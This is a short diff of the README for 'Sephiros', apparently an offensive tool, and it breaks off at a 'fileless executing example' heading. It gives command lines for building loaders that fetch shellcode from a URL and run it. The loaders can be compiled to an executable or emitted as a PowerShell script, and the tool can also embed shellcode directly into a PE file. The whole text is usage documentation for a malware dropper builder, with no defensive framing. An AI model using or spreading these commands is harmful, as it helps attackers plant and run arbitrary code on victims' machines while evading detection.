ELMERIKH/Sephiros/readme.md

 Usage: python Sephiros.py -url 'urlforshellcode'

+u can generate a ps1 script with -ps instead of building into exe

+python Sephiros.py -url 'urlforshellcode' -ps

-you can also just embed shellcode into the PE using -sh 'pathofshellcode'
+you can also just embed shellcode into the PE directly using -sh 'pathofshellcode'

+python Sephiros.py -sh 'pathto_shellcode'

 fileless executing example:
 -------------------